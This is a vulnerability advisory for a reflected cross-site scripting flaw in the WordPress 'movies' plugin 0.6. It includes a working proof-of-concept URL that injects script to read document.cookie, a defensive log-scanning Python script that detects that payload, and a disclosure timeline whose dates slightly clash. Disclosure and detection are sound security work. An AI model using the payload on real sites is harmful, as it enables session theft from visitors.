Plugin Details
Plugin Name: wp-plugin : movies
Affected Version : 0.6 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://127.0.0.1/wordpress/wp-content/wp-plugs/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
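A defender's check for this issue, as an added example that is not part of the original advisory: it scans web server access logs for requests to the bundled getID3 demo scripts and flags those whose `filename` parameter decodes to HTML metacharacters. The log lines are constructed, and the names `classify` and `scan` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (combined log format, documentation IP ranges).
# The first request line is the PoC URL from this advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [25/May/2014:10:00:01 +0000] "GET /wordpress/wp-content/wp-plugs/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1" 200 512
203.0.113.9 - - [25/May/2014:10:00:07 +0000] "GET /wordpress/wp-content/wp-plugs/movies/getid3/demos/demo.mimeonly.php?filename=clip.mp4 HTTP/1.1" 200 498
198.51.100.2 - - [25/May/2014:10:01:13 +0000] "GET /wordpress/?s=movies HTTP/1.1" 200 9120
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DEMO_PATH = re.compile(r"/getid3/demos/[^/]+\.php$", re.IGNORECASE)
MARKUP = re.compile(r"[<>\"']")  # characters that can break out of an HTML context


def classify(line):
    """Return None, 'demo-access' or 'markup-in-filename' for one log line."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not DEMO_PATH.search(url.path):
        return None
    # parse_qsl percent-decodes values, so %3Cscript%3E is seen as <script>
    for name, value in parse_qsl(url.query):
        if name == "filename" and MARKUP.search(value):
            return "markup-in-filename"
    return "demo-access"


def scan(log_text):
    """Return (finding, client_ip) for every flagged line, in log order."""
    findings = []
    for line in log_text.splitlines():
        finding = classify(line)
        if finding:
            findings.append((finding, line.split()[0]))
    return findings


if __name__ == "__main__":
    for finding, client in scan(SAMPLE_LOG):
        print(f"{client}\t{finding}")
```

A `demo-access` hit on its own is still worth following up, since it shows the getID3 demo directory is reachable from the web.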
Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4539
Plugin Description :
Movies allows you to use simple functions in your theme to display videos you have attached to Posts/Pages/Custom Post Types in your Media Library. Your player is styled 100% with CSS/images (if you want). The video player uses the MediaElement (by default, or VideoJS - you pick!) library and your browser's native HTML5 capabilities when available with a fallback to Flash when necessary. Allows you to play video inline on mobile browsers that support HTML5 Video. Video metadata is written to the page using the hMedia micro-format for semantic markup.
You can use this shortcode <code>[movies]</code> or <code>the_movies()</code> or <code>the_videos()</code> in your theme to output your item's attachments.
You may need to add these Mime-Type declarations to <code>httpd.conf</code> or your <code>.htaccess</code> file
<code>
AddType video/ogg .ogv
AddType video/mp4 .mp4
AddType video/webm .webm
</code>
Read More here: http://scottctaylor.wordpress.com/2010/11/24/new-plugin-movies/
Follow-up: http://scottctaylor.wordpress.com/2010/11/28/movies-plugin-now-supports-webm/
Latest: http://scottctaylor.wordpress.com/2010/12/07/movies-v0-4-now-with-mediaelement-support/